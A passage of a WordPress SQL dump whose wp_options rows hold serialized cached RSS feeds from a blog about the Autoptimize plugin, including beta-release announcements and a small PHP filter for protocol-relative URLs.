power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:15:"criticalcss.com";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:13:"jonas ohlsson";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:12:"this weekend";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10380";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:49:"Almost, but exclusively for you guys &#38; girls;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1132:"<p>Almost, but exclusively for you guys &amp; girls;</p>\n<p><a href="http://blog.futtta.be/2016/09/02/almost-time-to-announce/"><img src="https://i.ytimg.com/vi/S5sjZRWsgrM/hqdefault.jpg" alt="YouTube Video"></a><br />Watch this video <a href="http://youtu.be/S5sjZRWsgrM">on YouTube</a>.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/" rel="bookmark" title="Autoptimize Power-Up sneak peek; Noptimize">Autoptimize Power-Up sneak peek; Noptimize </a></li>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/e9COTtG7a6o" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:62:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:57:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:60:"How to force Autoptimize to output protocol-relative URL’s";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/1gJ-IhZMIOc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:100:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 02 Aug 2016 06:07:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"code snippets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"protocol-relative url";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10360";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:335:"Autoptimize by default uses WordPress&#8217; internal logic to determine if a URL should be HTTP or HTTPS. But in some cases WordPress may not be fully aware it is on HTTPS, or maybe you want part of your site HTTP and another part (cart &#038; checkout?) in HTTPS. Protocol-relative URL&#8217;s to the rescue, except Autoptimize [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1779:"<p>Autoptimize by default uses WordPress&#8217; internal logic to determine if a URL should be HTTP or HTTPS. But in some cases WordPress may not be fully aware it is on HTTPS, or maybe you want part of your site HTTP and another part (cart &#038; checkout?) in HTTPS. <a href="http://www.paulirish.com/2010/the-protocol-relative-url/">Protocol-relative URL&#8217;s</a> to the rescue, except Autoptimize does not do those, right?</p>\n<p>Well, not by default no. But the following code-snippet uses AO&#8217;s API to output protocol-relative URL&#8217;s (warning: not tested thoroughly in a production environment, but I&#8217;ll happy to assist in case of problems):</p>\n<pre class="brush: php; title: ; notranslate">\nadd_filter(\'autoptimize_filter_cache_getname\',\'protocollesser\');\nadd_filter(\'autoptimize_filter_base_replace_cdn\',\'protocollesser\');\nfunction protocollesser($urlIn) {\n  $urlOut=preg_replace(\'/https?:/i\',\'\',$urlIn);\n  return $urlOut;\n}\n</pre>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/10/07/3-interesting-wordpress-plugins/" rel="bookmark" title="3 interesting WordPress plugins">3 interesting WordPress plugins </a></li>\n<li><a href="http://blog.futtta.be/2013/10/04/i-want-you-for-autoptimize-1-7-0-and-beyond/" rel="bookmark" title="I want you for Autoptimize 1.7.0 (and beyond)!">I want you for Autoptimize 1.7.0 (and beyond)! </a></li>\n<li><a href="http://blog.futtta.be/2014/09/10/wp-seo-vs-autoptimize-who-broke-your-wordpress/" rel="bookmark" title="WP SEO vs Autoptimize; who broke your WordPress?">WP SEO vs Autoptimize; who broke your WordPress? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/1gJ-IhZMIOc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:96:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"8";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/08/02/how-to-force-autoptimize-to-output-protocol-relative-urls/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:57:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:42:"Preparing (for) Autoptimize 2.0.3 or 2.1.0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/_sch1G_dAw8/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:83:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 24 Jul 2016 08:46:08 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:6:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:16:"autoptimize beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:4:"test";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10353";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:354:"It&#8217;s that time of the year again where I humbly ask Autoptimize&#8217;s users to download and test the &#8220;beta&#8221;-version of the upcoming release. I&#8217;m not entirely sure whether this should be 2.0.3 (a minor release) or 2.1.0 (a major one), but I&#8217;ll let you guys &#38; girls decide, OK? Anyway, the following changes are in [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3059:"<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu.png"><img class="alignright size-medium wp-image-10354" src="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu-300x183.png" alt="" width="300" height="183" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu-300x183.png 300w, http://static-blog.futtta.be/wp-content/uploads/2016/07/ao_pablos_menu.png 501w" sizes="(max-width: 300px) 100vw, 300px" /></a>It&#8217;s that time of the year again where I humbly ask Autoptimize&#8217;s users to download and test the &#8220;beta&#8221;-version of the upcoming release. I&#8217;m not entirely sure whether this should be 2.0.3 (a minor release) or 2.1.0 (a major one), but I&#8217;ll let you guys &amp; girls decide, OK?</p>\n<p>Anyway, the following changes are in said new release;</p>\n<ul>\n<li>Autoptimize now adds a small menu to the admin-toolbar (can be disabled with a filter) that shows the cache size and provides the possibility to purge the cache. A big thanks to <a href="https://github.com/pablocusto">Pablo Custo</a> for his hard work on this nice feature!</li>\n<li>If the cache size becomes too big, a mail will be sent to the site admin (pass `false` to `autoptimize_filter_cachecheck_sendmail` filter to disable or pass alternative email to the `autoptimize_filter_cachecheck_mailto` filter)</li>\n<li>An extra tab is shown (can be hidden with a filter) with information about <a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/">my upcoming premium</a> <a href="http://blog.futtta.be/2016/05/24/autoptimize-power-up-sneak-peak-critical-css/">power-ups</a> and other optimization tools- and services.</li>\n<li>Misc. bugfixes &amp; small improvements (see <a href="https://github.com/futtta/autoptimize/commits/master">the commit-log on GitHub</a>)</li>\n</ul>\n<p>So, if you&#8217;re curious about Pablo&#8217;s beautiful menu or if you just want to help Autoptimize out, <a href="https://downloads.wordpress.org/plugin/autoptimize.zip">download the beta</a> and provide me with your feedback. If all goes well, we&#8217;ll be able to push it (2.1.0?) out in the first half of August!</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/12/09/bringing-autoptimize-2-0-beta-to-a-christmas-tree-near-you/" rel="bookmark" title="Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you">Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2016/02/29/heads-up-autoptimize-minor-release/" rel="bookmark" title="Heads up: Autoptimize minor release">Heads up: Autoptimize minor release </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/_sch1G_dAw8" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:79:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"18";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/07/24/preparing-for-autoptimize-2-0-3-or-2-1-0/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}s:44:"http://purl.org/rss/1.0/modules/syndication/";a:2:{s:12:"updatePeriod";a:1:{i:0;a:5:{s:4:"data";s:6:"hourly";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:15:"updateFrequency";a:1:{i:0;a:5:{s:4:"data";s:1:"1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:2:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:44:"http://feeds.feedburner.com/futtta_wordpress";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:3:"hub";s:4:"href";s:32:"http://pubsubhubbub.appspot.com/";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:4:"info";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:3:"uri";s:16:"futtta_wordpress";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:10:{s:12:"content-type";s:23:"text/xml; charset=UTF-8";s:4:"etag";s:27:"SjL8cNMi11gPrcaEkNRhMrSdPyQ";s:13:"last-modified";s:29:"Wed, 25 Jan 2017 12:12:53 GMT";s:16:"content-encoding";s:4:"gzip";s:4:"date";s:29:"Wed, 25 Jan 2017 14:07:36 GMT";s:7:"expires";s:29:"Wed, 25 Jan 2017 14:07:36 GMT";s:13:"cache-control";s:18:"private, max-age=0";s:22:"x-content-type-options";s:7:"nosniff";s:16:"x-xss-protection";s:13:"1; mode=block";s:6:"server";s:3:"GSE";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (607586, '_transient_timeout_feed_mod_3dcbbcc036ac7e5be38f83a0bd0adcdd', '1485396456', 'no'); 
INSERT INTO `wp_options` VALUES (607587, '_transient_feed_mod_3dcbbcc036ac7e5be38f83a0bd0adcdd', '1485353256', 'no'); 
INSERT INTO `wp_options` VALUES (607588, '_transient_timeout_feed_aed63b76c6b70f6096be5d99f700e3df', '1485396456', 'no'); 
INSERT INTO `wp_options` VALUES (607589, '_transient_feed_aed63b76c6b70f6096be5d99f700e3df', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:53:"futtta&#039;s blog &gt;&gt; web and mobile technology";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:21:"http://blog.futtta.be";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:49:"Feed for blogposts about web & mobile technology.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:30:"https://wordpress.org/?v=4.7.1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:37:"How to make Autoptimize (even) faster";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/nw4MFxsm8Fc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:7:"support";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"tips and tricks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10454";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:475:"Less blogposts here lately, mostly because I&#8217;m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more...<br/>\n<br/>\nClick on this article&#39;s title to continue reading &gt;&gt;<img src="http://feeds.feedburner.com/~r/futtta_webtech/~4/nw4MFxsm8Fc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:58:"WordPress 4.7 custom background image bug &amp; workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:61:"http://feedproxy.google.com/~r/futtta_webtech/~3/_HuuQwRh2Bo/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:95:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 07 Dec 2016 15:46:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:3:"bug";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:17:"custom background";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"wordpress 